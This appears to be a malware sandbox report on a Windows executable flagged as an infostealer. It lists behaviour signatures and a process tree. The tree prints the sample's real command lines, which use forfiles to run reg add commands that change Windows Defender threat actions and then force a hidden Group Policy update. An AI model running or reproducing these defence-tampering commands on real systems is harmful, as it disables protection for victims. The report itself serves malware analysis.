b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cb

Analysis

max time kernel
94s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2024, 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
Size

6.6MB
MD5

656c6c08423b90040270bbb368d86300
SHA1

8e84a7ae65327ec66cd47a8673141478902fea46
SHA256

b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cb
SHA512

4a21fca5f860c00335d16ccf4d3cc480d15a2e6b5432da713ab2948c2bd33c5c65d668754054b844aff27fb02dcd2b7622075e5079ed9622a4908f75f5f091c5
SSDEEP

196608:Ud9RBgw9eQ6VrV+A89q0tXfM5QRjSLdjns:876VsA8XNM5uSLdjs

Score

8^/10

defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4976	powershell.exe
2012	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Indirect Command Execution 1 TTPs 5 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
4820	forfiles.exe
4924	forfiles.exe
1724	forfiles.exe
4972	forfiles.exe
1152	forfiles.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\manifest.json	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\bcDGOSnszpTU2\jlgFEhpHjegQI.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\bcDGOSnszpTU2\veuUxjg.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\WhNqDlw.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\uulhOemmgIOXC\PMqJwzi.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\ZYpYvUfwMKUn\FmRcfnA.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\YRaAzzcUU\lFhHeQ.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\YRaAzzcUU\ccZwkaq.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\bGxAbsX.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\uulhOemmgIOXC\VyrYtII.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\OwQWslRjOgHVMZf.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3696	3300	WerFault.exe	81

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5096	schtasks.exe
784	schtasks.exe
2820	schtasks.exe
4544	schtasks.exe
3260	schtasks.exe
3148	schtasks.exe
3808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
4976	powershell.exe
4976	powershell.exe
4940	powershell.exe
4940	powershell.exe
2484	powershell.exe
2484	powershell.exe
2012	powershell.EXE
2012	powershell.EXE
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	2012	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 264	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	82
PID 3300 wrote to memory of 264	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	82
PID 3300 wrote to memory of 264	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	82
PID 264 wrote to memory of 4820	264	cmd.exe	84
PID 264 wrote to memory of 4820	264	cmd.exe	84
PID 264 wrote to memory of 4820	264	cmd.exe	84
PID 4820 wrote to memory of 4644	4820	forfiles.exe	85
PID 4820 wrote to memory of 4644	4820	forfiles.exe	85
PID 4820 wrote to memory of 4644	4820	forfiles.exe	85
PID 4644 wrote to memory of 4844	4644	cmd.exe	86
PID 4644 wrote to memory of 4844	4644	cmd.exe	86
PID 4644 wrote to memory of 4844	4644	cmd.exe	86
PID 264 wrote to memory of 4924	264	cmd.exe	87
PID 264 wrote to memory of 4924	264	cmd.exe	87
PID 264 wrote to memory of 4924	264	cmd.exe	87
PID 4924 wrote to memory of 3848	4924	forfiles.exe	88
PID 4924 wrote to memory of 3848	4924	forfiles.exe	88
PID 4924 wrote to memory of 3848	4924	forfiles.exe	88
PID 3848 wrote to memory of 4040	3848	cmd.exe	89
PID 3848 wrote to memory of 4040	3848	cmd.exe	89
PID 3848 wrote to memory of 4040	3848	cmd.exe	89
PID 264 wrote to memory of 1724	264	cmd.exe	90
PID 264 wrote to memory of 1724	264	cmd.exe	90
PID 264 wrote to memory of 1724	264	cmd.exe	90
PID 1724 wrote to memory of 2796	1724	forfiles.exe	91
PID 1724 wrote to memory of 2796	1724	forfiles.exe	91
PID 1724 wrote to memory of 2796	1724	forfiles.exe	91
PID 2796 wrote to memory of 4788	2796	cmd.exe	92
PID 2796 wrote to memory of 4788	2796	cmd.exe	92
PID 2796 wrote to memory of 4788	2796	cmd.exe	92
PID 264 wrote to memory of 4972	264	cmd.exe	93
PID 264 wrote to memory of 4972	264	cmd.exe	93
PID 264 wrote to memory of 4972	264	cmd.exe	93
PID 4972 wrote to memory of 4988	4972	forfiles.exe	94
PID 4972 wrote to memory of 4988	4972	forfiles.exe	94
PID 4972 wrote to memory of 4988	4972	forfiles.exe	94
PID 4988 wrote to memory of 1564	4988	cmd.exe	95
PID 4988 wrote to memory of 1564	4988	cmd.exe	95
PID 4988 wrote to memory of 1564	4988	cmd.exe	95
PID 264 wrote to memory of 1152	264	cmd.exe	96
PID 264 wrote to memory of 1152	264	cmd.exe	96
PID 264 wrote to memory of 1152	264	cmd.exe	96
PID 1152 wrote to memory of 4504	1152	forfiles.exe	97
PID 1152 wrote to memory of 4504	1152	forfiles.exe	97
PID 1152 wrote to memory of 4504	1152	forfiles.exe	97
PID 4504 wrote to memory of 4976	4504	cmd.exe	98
PID 4504 wrote to memory of 4976	4504	cmd.exe	98
PID 4504 wrote to memory of 4976	4504	cmd.exe	98
PID 4976 wrote to memory of 5044	4976	powershell.exe	99
PID 4976 wrote to memory of 5044	4976	powershell.exe	99
PID 4976 wrote to memory of 5044	4976	powershell.exe	99
PID 3300 wrote to memory of 4940	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	105
PID 3300 wrote to memory of 4940	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	105
PID 3300 wrote to memory of 4940	3300	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	105
PID 4940 wrote to memory of 4532	4940	powershell.exe	107
PID 4940 wrote to memory of 4532	4940	powershell.exe	107
PID 4940 wrote to memory of 4532	4940	powershell.exe	107
PID 4532 wrote to memory of 3912	4532	cmd.exe	108
PID 4532 wrote to memory of 3912	4532	cmd.exe	108
PID 4532 wrote to memory of 3912	4532	cmd.exe	108
PID 4940 wrote to memory of 904	4940	powershell.exe	109
PID 4940 wrote to memory of 904	4940	powershell.exe	109
PID 4940 wrote to memory of 904	4940	powershell.exe	109
PID 4940 wrote to memory of 4628	4940	powershell.exe	110

C:\Users\Admin\AppData\Local\Temp\b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
"C:\Users\Admin\AppData\Local\Temp\b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:264
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4644
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4844
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4924
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3848
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4040
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2796
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4988
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1564
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1152
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4976
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
